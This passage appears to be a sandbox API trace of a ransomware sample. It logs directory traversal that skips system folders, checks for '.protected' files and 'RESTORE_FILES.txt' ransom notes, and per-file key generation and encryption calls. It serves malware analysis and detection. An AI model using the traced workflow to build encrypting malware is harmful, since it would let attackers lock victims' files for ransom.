(lpString1="Help_MKWD_BestBet.H1W.protected", lpString2="Program Files") returned -1 [0093.113] lstrcmpiW (lpString1="Help_MKWD_BestBet.H1W.protected", lpString2="Program Files (x86)") returned -1 [0093.113] lstrcmpiW (lpString1="Help_MKWD_BestBet.H1W.protected", lpString2="$Recycle.bin") returned 1 [0093.113] lstrcmpiW (lpString1="Help_MKWD_BestBet.H1W.protected", lpString2="System Volume Information") returned -1 [0093.113] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All 
Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MKWD_BestBet.H1W.protected") returned 92 [0093.113] StrStrIW (lpFirst="Help_MKWD_BestBet.H1W.protected", lpSrch=".protected") returned=".protected" [0093.113] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0093.113] lstrcmpiW (lpString1="Help_MTOC_help.H1H.protected", lpString2="Windows") returned -1 [0093.113] lstrcmpiW (lpString1="Help_MTOC_help.H1H.protected", lpString2="Program Files") returned -1 [0093.113] lstrcmpiW (lpString1="Help_MTOC_help.H1H.protected", lpString2="Program Files (x86)") returned -1 [0093.113] lstrcmpiW (lpString1="Help_MTOC_help.H1H.protected", lpString2="$Recycle.bin") returned 1 [0093.113] lstrcmpiW (lpString1="Help_MTOC_help.H1H.protected", lpString2="System Volume Information") returned -1 [0093.113] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MTOC_help.H1H.protected") returned 89 [0093.114] StrStrIW (lpFirst="Help_MTOC_help.H1H.protected", lpSrch=".protected") returned=".protected" [0093.114] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0093.114] lstrcmpiW (lpString1="Help_MValidator.H1D.protected", lpString2="Windows") returned -1 [0093.114] lstrcmpiW (lpString1="Help_MValidator.H1D.protected", lpString2="Program Files") returned -1 [0093.114] lstrcmpiW (lpString1="Help_MValidator.H1D.protected", lpString2="Program Files (x86)") returned -1 [0093.114] lstrcmpiW (lpString1="Help_MValidator.H1D.protected", lpString2="$Recycle.bin") returned 1 [0093.114] lstrcmpiW (lpString1="Help_MValidator.H1D.protected", lpString2="System Volume Information") returned -1 [0093.114] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All 
Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MValidator.H1D.protected") returned 90 [0093.114] StrStrIW (lpFirst="Help_MValidator.H1D.protected", lpSrch=".protected") returned=".protected" [0093.114] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0093.114] lstrcmpiW (lpString1="Help_MValidator.Lck.protected", lpString2="Windows") returned -1 [0093.114] lstrcmpiW (lpString1="Help_MValidator.Lck.protected", lpString2="Program Files") returned -1 [0093.114] lstrcmpiW (lpString1="Help_MValidator.Lck.protected", lpString2="Program Files (x86)") returned -1 [0093.114] lstrcmpiW (lpString1="Help_MValidator.Lck.protected", lpString2="$Recycle.bin") returned 1 [0093.114] lstrcmpiW (lpString1="Help_MValidator.Lck.protected", lpString2="System Volume Information") returned -1 [0093.114] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MValidator.Lck.protected") returned 90 [0093.114] StrStrIW (lpFirst="Help_MValidator.Lck.protected", lpSrch=".protected") returned=".protected" [0093.114] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0093.114] lstrcmpiW (lpString1="Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q.protected", lpString2="Windows") returned -1 [0093.114] lstrcmpiW (lpString1="Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q.protected", lpString2="Program Files") returned -1 [0093.114] lstrcmpiW (lpString1="Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q.protected", lpString2="Program Files (x86)") returned -1 [0093.114] lstrcmpiW (lpString1="Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q.protected", lpString2="$Recycle.bin") returned 1 [0093.114] lstrcmpiW (lpString1="Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q.protected", lpString2="System Volume Information") returned -1 [0093.114] wnsprintfW (in: pszDest=0x4dfbb0, 
cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q.protected") returned 117 [0093.114] StrStrIW (lpFirst="Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q.protected", lpSrch=".protected") returned=".protected" [0093.114] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0093.114] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.114] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.114] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.114] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.114] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.114] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\RESTORE_FILES.txt") returned 78 [0093.114] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.114] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.114] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0093.114] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0093.114] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\RESTORE_FILES.txt") returned 78 [0093.114] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\assistance\\client\\1.0\\en-us\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, 
dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.115] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.115] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.115] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.115] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.115] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.115] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.115] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\RESTORE_FILES.txt") returned 72 [0093.115] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.115] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.115] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0093.115] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0093.115] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\RESTORE_FILES.txt") returned 72 [0093.115] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\assistance\\client\\1.0\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.115] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.115] lstrcmpiW (lpString1="RESTORE_FILES.txt", 
lpString2="Windows") returned -1 [0093.115] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.115] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.115] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.115] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.115] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\RESTORE_FILES.txt") returned 68 [0093.115] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.115] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.115] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0093.115] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0093.116] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\RESTORE_FILES.txt") returned 68 [0093.116] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\assistance\\client\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.116] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.116] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.116] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.116] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.117] lstrcmpiW (lpString1="RESTORE_FILES.txt", 
lpString2="$Recycle.bin") returned 1 [0093.117] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.117] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\RESTORE_FILES.txt") returned 61 [0093.117] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.117] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.117] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0093.117] FindClose (in: hFindFile=0x47b9d0 | out: hFindFile=0x47b9d0) returned 1 [0093.117] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\RESTORE_FILES.txt") returned 61 [0093.117] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\assistance\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.117] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.118] lstrcmpiW (lpString1="Crypto", lpString2="Windows") returned -1 [0093.118] lstrcmpiW (lpString1="Crypto", lpString2="Program Files") returned -1 [0093.118] lstrcmpiW (lpString1="Crypto", lpString2="Program Files (x86)") returned -1 [0093.118] lstrcmpiW (lpString1="Crypto", lpString2="$Recycle.bin") returned 1 [0093.118] lstrcmpiW (lpString1="Crypto", lpString2="System Volume Information") returned -1 [0093.118] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto") returned 39 [0093.118] lstrcmpW (lpString1="Crypto", lpString2=".") returned 1 [0093.118] lstrcmpW 
(lpString1="Crypto", lpString2="..") returned 1 [0093.118] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\*") returned 41 [0093.118] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b9d0 [0093.118] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.118] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.118] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.118] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.118] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.118] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\.") returned 41 [0093.118] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.118] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.118] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.118] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.118] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.118] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.118] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.118] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\..") returned 42 [0093.118] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.119] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.119] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.119] lstrcmpiW (lpString1="DSS", lpString2="Windows") returned -1 [0093.119] lstrcmpiW 
(lpString1="DSS", lpString2="Program Files") returned -1 [0093.119] lstrcmpiW (lpString1="DSS", lpString2="Program Files (x86)") returned -1 [0093.119] lstrcmpiW (lpString1="DSS", lpString2="$Recycle.bin") returned 1 [0093.119] lstrcmpiW (lpString1="DSS", lpString2="System Volume Information") returned -1 [0093.119] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\DSS") returned 43 [0093.119] lstrcmpW (lpString1="DSS", lpString2=".") returned 1 [0093.119] lstrcmpW (lpString1="DSS", lpString2="..") returned 1 [0093.119] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\*") returned 45 [0093.119] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 [0093.119] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.119] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.119] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.119] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.119] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.119] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\.") returned 45 [0093.119] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.120] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.120] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.120] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.120] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.120] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.120] lstrcmpiW 
(lpString1="..", lpString2="System Volume Information") returned -1 [0093.120] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\..") returned 46 [0093.120] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.120] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.120] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.120] lstrcmpiW (lpString1="MachineKeys", lpString2="Windows") returned -1 [0093.120] lstrcmpiW (lpString1="MachineKeys", lpString2="Program Files") returned -1 [0093.120] lstrcmpiW (lpString1="MachineKeys", lpString2="Program Files (x86)") returned -1 [0093.120] lstrcmpiW (lpString1="MachineKeys", lpString2="$Recycle.bin") returned 1 [0093.120] lstrcmpiW (lpString1="MachineKeys", lpString2="System Volume Information") returned -1 [0093.120] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\MachineKeys") returned 55 [0093.120] lstrcmpW (lpString1="MachineKeys", lpString2=".") returned 1 [0093.120] lstrcmpW (lpString1="MachineKeys", lpString2="..") returned 1 [0093.120] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\MachineKeys\\*") returned 57 [0093.120] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\MachineKeys\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0093.120] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.120] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.120] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.120] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.120] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.121] 
wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\MachineKeys\\.") returned 57 [0093.121] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.121] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.121] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.121] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.121] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.121] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.121] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.121] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\MachineKeys\\..") returned 58 [0093.121] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.121] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.121] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.121] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.121] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.121] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.121] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.121] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.121] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\MachineKeys\\RESTORE_FILES.txt") returned 73 [0093.121] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.121] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 
[0093.121] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0093.121] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0093.121] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\MachineKeys\\RESTORE_FILES.txt") returned 73 [0093.121] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\MachineKeys\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\crypto\\dss\\machinekeys\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.121] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.121] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.121] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.121] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.121] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.121] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.121] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\RESTORE_FILES.txt") returned 61 [0093.121] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.122] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.122] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0093.122] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0093.122] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: 
pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\RESTORE_FILES.txt") returned 61 [0093.122] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\crypto\\dss\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.123] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.123] lstrcmpiW (lpString1="Keys", lpString2="Windows") returned -1 [0093.123] lstrcmpiW (lpString1="Keys", lpString2="Program Files") returned -1 [0093.123] lstrcmpiW (lpString1="Keys", lpString2="Program Files (x86)") returned -1 [0093.123] lstrcmpiW (lpString1="Keys", lpString2="$Recycle.bin") returned 1 [0093.123] lstrcmpiW (lpString1="Keys", lpString2="System Volume Information") returned -1 [0093.123] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\Keys") returned 44 [0093.123] lstrcmpW (lpString1="Keys", lpString2=".") returned 1 [0093.123] lstrcmpW (lpString1="Keys", lpString2="..") returned 1 [0093.123] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\Keys\\*") returned 46 [0093.123] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\Keys\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 [0093.123] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.123] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.123] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.123] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.123] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.123] 
wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\Keys\\.") returned 46 [0093.123] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.123] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0093.123] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0093.123] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0093.123] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0093.123] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\Keys\\." (normalized: "c:\\users\\all users\\microsoft\\crypto\\keys\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.123] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.124] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.124] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.124] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.124] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.124] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.124] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\Keys\\..") returned 47 [0093.124] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.124] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.124] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0093.124] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0093.124] CryptGenRandom (in: hProv=0x444d38, 
